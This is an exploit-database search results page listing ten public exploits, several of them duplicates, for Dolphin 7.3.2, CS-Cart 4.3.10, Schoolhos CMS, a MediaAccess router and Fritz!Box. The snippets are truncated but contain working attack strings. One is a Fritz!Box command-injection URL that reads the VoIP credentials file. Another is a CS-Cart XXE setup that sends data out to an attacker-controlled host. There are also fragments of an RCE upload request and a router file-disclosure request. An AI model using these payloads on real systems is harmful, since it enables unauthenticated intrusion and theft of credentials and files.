10 matches found
Dolphin 7.3.2 authentication bypass and command execution vulnerabilities
No description provided by source. #!/usr/bin/env python # -*- coding: utf-8 -*- ''' Software : Dolphin = 7.3.2 Auth bypass / RCE exploit Vendor : www.boonex.com Author : Ahmed sultan 0x4148 Home : 0x4148.com | https://www.linkedin.com/in/0x4148 Email : [email protected] Auth bypass trick credit goes to...
CS-Cart 4.3.10 - XML External Entity Injection Vulnerability
Exploit for php platform in category web applications Software : CS-Cart Ahmed sultan 0x4148 "; echo rawurlencodebase64encode$xml; ? change YOURHOST to your server address, use the output in the following POST request Action - HOST/cs-cart/index.php?dispatch=twigmo.post Data -...
CS-Cart 4.3.10 - XML External Entity Injection
Software : CS-Cart Ahmed sultan 0x4148 "; echo rawurlencodebase64encode$xml; ? change YOURHOST to your server address, use the output in the following POST request Action - HOST/cs-cart/index.php?dispatch=twigmo.post Data - action=addtocart&data=DATAOUTPUTHERE&format=xml a GET request will be se...
Dolphin 7.3.2 Authentication Bypass / Remote Command Execution
#!/usr/bin/env python # -*- coding: utf-8 -*- ''' Software : Dolphin = 7.3.2 Auth bypass / RCE exploit Vendor : www.boonex.com Author : Ahmed sultan 0x4148 Home : 0x4148.com | https://www.linkedin.com/in/0x4148 Email : [email protected] Auth bypass trick credit goes to Saadat Ullah ''' import os import s...
Boonex Dolphin 7.3.2 - Authentication Bypass Remote Code Execution
Boonex Dolphin 7.3.2 - Authentication Bypass Remote Code Execution #!/usr/bin/env python # -*- coding: utf-8 -*- ''' Software : Dolphin = 7.3.2 Auth bypass / RCE exploit Vendor : www.boonex.com Author : Ahmed sultan 0x4148 Home : 0x4148.com | https://www.linkedin.com/in/0x4148 Email : [email protected]...
Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection
\x0d\x0a-----------------------------26518470919255\x0d\x0a\x0d\x0a' \ 'http://HOST/PATH/elearningku/proses.php?pilih=guru&untukdi=upload' php file can be c...
Schoolhos CMS 2.29 - Remote Code Execution SQL Injection
Schoolhos CMS 2.29 - Remote Code Execution SQL Injection \x0d\x0a-----------------------------26518470919255\x0d\x0a\x0d\x0a' \ 'http://HOST/PATH/elearningku/proses.php?pilih=guru&untukdi=upload'...
MediaAccess TG788vn - File Disclosure
Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall Author : Ahmed Sultan 0x4148 Email : [email protected] MediaAccess TG788vn with Cisco firewall http config is vulnerable to a critical unauthenticated file disclosure flaw, POC Request: POST /scgi-bin/platform.cgi HTTP/1.1 Host:...
Fritz!Box - Remote Command Execution Exploit
No description provided by source. App : Fritz!Box Author : 0x4148 Fritz!Box is a networking/Voice over IP router produced by AVM; it suffers from an unauthenticated remote command execution flaw Poc : https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%...
Fritz!Box - Remote Command Execution
App : Fritz!Box Author : 0x4148 Fritz!Box is a networking/Voice over IP router produced by AVM; it suffers from an unauthenticated remote command execution flaw Poc : https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26 0x4148rise...